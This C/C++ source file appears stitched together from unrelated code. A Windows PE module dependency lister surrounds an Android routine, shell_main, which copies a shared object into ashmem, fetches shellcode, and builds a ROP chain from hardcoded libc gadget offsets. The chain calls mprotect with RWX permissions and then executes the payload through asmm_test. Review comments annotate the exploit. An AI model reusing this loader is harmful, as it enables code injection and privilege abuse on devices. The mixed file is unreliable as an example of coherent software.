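// Program entry point.
//
// Parses the command line, builds the dependency list of g_pszPrimaryFile
// and prints one line per module found, followed by the names of the
// modules that module references but which could not be located.
//
// Returns 1 on a usage error (help text printed) or when the dependency
// list could not be built (error text printed), 0 otherwise.
int main( int argc, char * argv[] )
{
    if ( !ProcessCommandLine( argc, argv ) )
    {
        // argv[0] is not guaranteed to exist (argc == 0); never hand NULL to "%s".
        const char * pszProgram = ( argc > 0 && argv[0] ) ? argv[0] : "";
        // sizeof yields a size_t; passing it to a "%d" conversion is undefined,
        // so convert to the type the conversion expects.
        printf( "%s %u bit build\n%s", pszProgram,
                (unsigned)(8 * sizeof(void*)), g_szHelpSyntax );
        return 1;
    }

    MODULE_DEPENDENCY_LIST depends( g_pszPrimaryFile );
    if ( !depends.IsValid() )
    {
        printf( "Error: %s %s\n", g_pszPrimaryFile, depends.GetErrorString() );
        return 1;
    }

    // GetNextModule() / GetNextNotFoundModule() are cursor-style iterators:
    // pass the previous entry (0 to start) and receive the next, or 0 at the end.
    PMODULE_FILE_INFO pModInfo = 0;
    while ( (pModInfo = depends.GetNextModule( pModInfo )) != 0 )
    {
        DisplayFileInformation( pModInfo, g_fQuiet );

        PMODULE_FILE_INFO pNotFound = 0;
        while ( (pNotFound = pModInfo->GetNextNotFoundModule( pNotFound )) != 0 )
        {
            LPCTSTR base = getModuleBase( pNotFound, g_fQuiet );
            if ( base )
                printf( " Not found: %s\n", base );
        }
    }

    return 0;
}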
/*
 * shell_main: copies a shared-object image from disk into an anonymous
 * shared-memory (ashmem) region, then calls asmm_test() with a table of
 * addresses and constants. It does not return normally; it ends in exit(-1).
 *
 * NOTE(review): no return value is checked in this function. get_so_buffer()
 * may return NULL (dereferenced on the next line), ashmem_create_region()
 * may return a negative fd, and mmap() may return MAP_FAILED (then passed to
 * memcpy). Each of these would fault or corrupt memory.
 *
 * NOTE(review): every pointer is narrowed to uint32_t. That only makes sense
 * in a 32-bit process; a 64-bit build silently loses the upper half of each
 * address.
 */
void shell_main(){
    /* Function pointers are resolved through the project's own lookup helper.
     * dlsym_f is assigned but never used below. */
    dlopen_t dlopen_f = (dlopen_t)getProcAddr(NULL,"dlopen");
    dlsym_t dlsym_f = (dlsym_t)getProcAddr(NULL,"dlsym");
    const char *so_name = "/data/local/tmp/testso.so";
    /* get_so_buffer() hands back a heap buffer (freed below); its first
     * sizeof(int) bytes are read as the length of the payload. */
    char *code = (char*)get_so_buffer(so_name);
    int ashmem_len = *(int*)code;
    /* ashmem region of ashmem_len bytes, pinned, mapped read/write + shared. */
    int fd_memory = ashmem_create_region("shmem", ashmem_len);
    ashmem_pin_region(fd_memory, 0, 0);
    uint8_t *shm = (uint8_t*)mmap(NULL, ashmem_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd_memory, 0);
    printf("first map address is %p\n",shm);
    /* Whole buffer, including the leading length word, is copied into the mapping. */
    memcpy(shm,code,ashmem_len);
    free(code);
    //ashmem_unpin_region(fd_memory, 0, 0);
    /* Only the first four of 32 entries are set (fd_memory is the fourth);
     * the remaining 28 are zero-initialised. */
    int pos[32]={12,2,12,fd_memory};
    //shellcode(dlopen_f,pos);
    /* libc base and the address of libc's mprotect, narrowed to 32 bits. */
    uint32_t libcbase = (uint32_t)getModuleBase("libc.so");
    uint32_t mprotect_address = (uint32_t)getProcAddr("libc.so","mprotect");
    uint32_t len = 0;
    /* len is written by the callee but never read afterwards. */
    void *buffer = get_shellcode(&len);
    /* Table passed to asmm_test(): 12 of 29 entries set, the rest zero.
     * The two libcbase+0x... constants are fixed offsets into one specific
     * libc build and cannot be interpreted from this file alone.
     * Entry 4 rounds buffer down to a 4 KiB boundary (cast binds before &),
     * entry 5 is a 4096-byte length and entry 6 is 0x7 ==
     * PROT_READ|PROT_WRITE|PROT_EXEC, next to the mprotect address: an
     * RWX protection change on a heap page is the behaviour endpoint
     * security tooling keys on. */
    uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,(uint32_t)pos,2,(uint32_t)buffer+1};
    //uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,1,2,(uint32_t)shellcode};
    asmm_test((uint32_t)ropData);
    /* buffer is released; shm is never unmapped and fd_memory never closed —
     * the process is about to exit, so the kernel reclaims both. */
    free(buffer);
    /* Only the low 8 bits are reported to the parent, i.e. status 255. */
    exit(-1);
}
// Formats a FILETIME through the project's date/time helpers and prints it
// as "<date> <time> " (trailing space, no newline).
static void PrintFileTimeStamp( FILETIME * pft )
{
    char szDate[32] = { 0 };
    char szTime[32] = { 0 };
    GetFileDateAsString( pft, szDate, sizeof(szDate) );
    GetFileTimeAsString( pft, szTime, sizeof(szTime), TRUE );
    printf( "%s %s ", szDate, szTime );
}

// Prints one report line for a module: its base name, then, depending on the
// g_fShow* option globals, the file's last-write time, the PE link time stamp,
// the full path in parentheses, and finally its version information.
//
// Does nothing when getModuleBase() yields no name for pModInfo.
// bQuiet is forwarded to getModuleBase() unchanged.
void DisplayFileInformation( PMODULE_FILE_INFO pModInfo, BOOL bQuiet )
{
    LPCTSTR pszBase = getModuleBase( pModInfo, bQuiet );
    if ( !pszBase )
        return;

    printf( "%-14s", pszBase );

    PSTR pszFullName = pModInfo->GetFullName();

    if ( g_fShowDateTime )
    {
        HFILE hFile = _lopen( pszFullName, OF_READ );
        if ( hFile != HFILE_ERROR )
        {
            // Only the last-write time is requested (creation/last-access are 0).
            FILETIME ftLastWrite;
            if ( GetFileTime( (HANDLE)hFile, 0, 0, &ftLastWrite ) )
                PrintFileTimeStamp( &ftLastWrite );
            _lclose( hFile );
        }
    }

    if ( g_fShowLinkDateTime )
    {
        // The PE header's TimeDateStamp is converted to a FILETIME for printing.
        PE_EXE exe( pszFullName );
        FILETIME ftLink;
        TimeDateStampToFileTime( exe.GetTimeDateStamp(), &ftLink );
        PrintFileTimeStamp( &ftLink );
    }

    if ( g_fShowFullPath )
        printf( "(%s)", pszFullName );
    printf( "\n" );

    if ( g_fShowVersion )
        ShowVersionInfo( pszFullName );
}